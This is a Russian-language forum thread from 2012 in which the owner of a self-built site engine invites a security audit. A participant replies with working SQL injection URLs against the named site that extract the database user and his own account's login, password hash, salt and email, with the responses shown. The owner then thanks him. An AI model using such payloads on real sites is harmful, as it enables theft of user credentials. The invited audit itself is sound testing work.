Старый 26.08.2012, 09:05   #1
kingbeef
 
Регистрация: 28.10.2011
Сообщений: 17
Репутация: 0
По умолчанию Аудит сайта.

Самописный движок

http://vrn1.ru
100% движка(кроме поддоменов) написаны с нуля, просьба проверить на возможнгые уязвимости
kingbeef вне форума  
Старый 27.08.2012, 11:54   #2
BigBear
 
Регистрация: 26.07.2012
Сообщений: 134
Репутация: 51
По умолчанию

Ну вот как то так...

Нефильтруемая переменная id

Inject

Код:
http://vrn1.ru/index.php?act=attach&type=post&id=-99+union+all+select+user()--
Response

Код:
vrn1_user@localhosto
Ну и понеслось...

Код:
http://vrn1.ru/index.php?act=attach&type=post&id=-99+union+all+select+(select+concat(0x27,0x7e,unhex(Hex(cast(users.id+as+char))),0x5e,unhex(Hex(cast(users.login+as+char))),0x5e,unhex(Hex(cast(users.pass+as+char))),0x5e,unhex(Hex(cast(users.salt+as+char))),0x5e,unhex(Hex(cast(users.email+as+char))),0x27,0x7e)+from+%60vrn1_bd%60.users+where+id=12792)+--
Response

Код:
http://vrn1.ru/img/'~12792^BigBear^cb50ba4d1184b689ceb1050e5afcedc9^?i2XF^BigBear2008@yandex.ru'~o
12792 - мой акк, чтобы никого не палить)
BigBear вне форума  
Старый 27.08.2012, 13:22   #3
Mantius
 
Регистрация: 27.08.2012
Сообщений: 3
Репутация: 0
По умолчанию

BigBear большое спасибо, что докопали так глубоко!
Это модуль совместимости со старой версией форума(была на движке ипб), там есть редиректы для тем, сообщений, профилей, разделов, поиска и, собственно, аттачей. Уязвимость была только в аттачах(допущена по невнимательности) и вы всё равно смогли найти её - браво! Это при том, что старые урлы в движке не используются(index.php вообще физически не существует на сервере) и отдельного труда стоило найти их и обратить внимание на реализованную обратную совместимость.

Если честно, поначалу не воспринял всерьёз совет kingbeef создать тему именно на этом форуме, подумав, что здесь не будет нормальных спецов, а теперь вижу, что был не прав=)
Mantius вне форума  
Старый 27.08.2012, 13:38   #4
Mantius
 
Регистрация: 27.08.2012
Сообщений: 3
Репутация: 0
По умолчанию

На vrn1.ru движок первый полностью с нуля написанный мной - его я писал и параллельно изучал необходимые языки/технологии(пхп и html немного знал, мускул, яваскрипт, jquery и css пришлось учить с нуля) в течении двух месяцев. Собственно, до сих пор он остаётся самым функциональным из всех мной написанных, потому и уязвимостей, на мой взгляд, в нём больше всего.
Mantius вне форума  
Старый 01.10.2012, 14:08   #5
Mantius
 
Регистрация: 27.08.2012
Сообщений: 3
Репутация: 0
По умолчанию

Тестирование окончено, спасибо всем участникам! Отписываться большинство не стали, но по логам я вижу, что люди активно участвовали и искали дыры - благодарность им за это.
Mantius вне форума  
Закрытая тема

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot